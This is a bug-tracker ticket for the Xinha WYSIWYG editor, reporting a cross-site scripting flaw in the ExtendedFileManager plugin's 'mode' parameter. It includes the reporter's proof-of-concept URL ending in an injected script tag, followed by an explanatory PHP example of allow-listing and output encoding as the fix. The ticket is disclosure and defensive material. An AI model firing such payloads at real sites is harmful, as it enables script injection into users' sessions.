Opened 7 years ago

Last modified 7 years ago

#1529 new defect

Security Issues in XINHA WYSIWYG 0.96.1

Reported by: guest
Owned by: gogo
Priority: normal
Milestone: 0.97
Component: Xinha Core
Version: trunk
Severity: normal
Keywords: security issue
Cc: david.kurz@…

Description

Hello there,

we at MajorSecurity found some security related vulnerabilities within XINHA WYSIWYG Editor. Please tell me the email address I should send the security related details to.

You may contact me at: david.kurz[(at)]majorsecurity[(dot)]net

Best regards,

David Vieira-Kurz
Head of Security Research, MajorSecurity

Change History (2)

comment:1 follow-up: Changed 7 years ago by ejucovy

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

comment:2 in reply to: ↑ 1 Changed 7 years ago by gogo

Replying to ejucovy:

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

I emailed them when they posted, this is what they said...


Hello,

first of all thank you for the fast answer.

We at MajorSecurity have discovered some vulnerabilities in one of the
Plugins in XINHA WYSIWYG Editor version 0.96.1, which can be exploited
by malicious people to conduct cross-site scripting attacks. Input
passed directly to the "mode" parameter in "backend.php" of the
"ExtendedFileManager" Plugin is not properly sanitised before being
stored and returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of
an affected site.

Proof of Concept:

http://localhost/xinha-0.96.1/plugins/ExtendedFileManager/backend.php?__plugin=ExtendedFileManager&__function=manager&backend_data[data]=a%3A9%3A{s%3A17%3A%22max_foldersize_mb%22%3Bi%3A10%3Bs%3A9%3A%22files_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A10%3A%22images_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A9%3A%22files_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A10%3A%22images_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A21%3A%22images_enable_styling%22%3Bb%3A0%3Bs%3A21%3A%22max_filesize_kb_image%22%3Bi%3A200%3Bs%3A20%3A%22max_filesize_kb_link%22%3Bs%3A3%3A%22max%22%3Bs%3A23%3A%22allowed_link_extensions%22%3Ba%3A12%3A{i%3A0%3Bs%3A3%3A%22jpg%22%3Bi%3A1%3Bs%3A3%3A%22gif%22%3Bi%3A2%3Bs%3A2%3A%22js%22%3Bi%3A3%3Bs%3A3%3A%22pdf%22%3Bi%3A4%3Bs%3A3%3A%22zip%22%3Bi%3A5%3Bs%3A3%3A%22txt%22%3Bi%3A6%3Bs%3A3%3A%22psd%22%3Bi%3A7%3Bs%3A3%3A%22png%22%3Bi%3A8%3Bs%3A4%3A%22html%22%3Bi%3A9%3Bs%3A3%3A%22swf%22%3Bi%3A10%3Bs%3A3%3A%22xml%22%3Bi%3A11%3Bs%3A3%3A%22xls%22%3B}}&backend_data[session_name]=PHPSESSID&backend_data[key_location]=Xinha%3ABackendKey&backend_data[hash]=582686c520f11fc779ada11642d7e3b5711a3c37&PHPSESSID=599be382ae27a9a75cd2e7d039b2098a&mode="<script>alert(/XSS/)</script>

Solution:
Web applications should never trust user-generated input and should
therefore sanitise all input. Edit the source code to ensure that input
is properly sanitised.


I don't remember if I did anything about it.
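The email above describes the defect only at the level of "the mode parameter is returned without sanitisation"; Xinha's actual backend.php code is not on this ticket. The following PHP is an added example, not the project's code, that contrasts that unsafe pattern with the fix the reporter asks for: restrict the parameter to an allow-list and HTML-encode it at the point of output. The accepted mode values (`image`, `file`) and the `render_mode_*` function names are placeholders assumed for the example.

```php
<?php
// Added example, not Xinha's own backend.php. Shows the two defences for a
// request parameter that is written back into HTML: allow-listing and
// output encoding.

// Constructed placeholder list of accepted modes (the real set used by the
// ExtendedFileManager plugin is not shown on the ticket).
const ALLOWED_MODES = ['image', 'file'];

// Unsafe pattern: the raw parameter is concatenated straight into markup,
// so a value that closes the attribute is rendered by the browser as HTML.
function render_mode_unsafe(string $mode): string
{
    return '<input type="hidden" name="mode" value="' . $mode . '">';
}

// Step 1 of the fix: accept only the values the application expects.
// Returns null for anything else so the caller can fall back to a default.
function validate_mode(?string $mode): ?string
{
    if ($mode === null || !in_array($mode, ALLOWED_MODES, true)) {
        return null;
    }
    return $mode;
}

// Step 2 of the fix: encode on output regardless of validation (defence in
// depth). ENT_QUOTES escapes both quote characters so the value cannot end
// the attribute; the explicit charset keeps encoding consistent with the page.
function render_mode_safe(?string $mode): string
{
    $mode = validate_mode($mode) ?? 'file';      // default when rejected
    $escaped = htmlspecialchars($mode, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="mode" value="' . $escaped . '">';
}

// Self-check on a constructed hostile value: the unsafe renderer keeps the
// injected tag intact, the allow-list rejects it, and encoding alone would
// have neutralised the quote and angle brackets even without the allow-list.
function self_check(): bool
{
    $hostile = '"><b>injected</b>';
    $unsafe  = render_mode_unsafe($hostile);
    $safe    = render_mode_safe($hostile);        // falls back to 'file'
    $encoded = htmlspecialchars($hostile, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    return strpos($unsafe, '<b>') !== false
        && strpos($safe, '<b>') === false
        && $safe === '<input type="hidden" name="mode" value="file">'
        && $encoded === '&quot;&gt;&lt;b&gt;injected&lt;/b&gt;';
}

// Usage: in a web request $_GET['mode'] carries the parameter; on the CLI
// $_GET is empty and the default mode is emitted.
echo render_mode_safe($_GET['mode'] ?? null), PHP_EOL;
echo self_check() ? "self-check passed" : "self-check failed", PHP_EOL;
```

The same output encoding applies when the value has been stored and is read back later, which matters here because the report says the parameter is "stored and returned": what protects the page is encoding at the point where the value is written into HTML, not where it first arrived.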
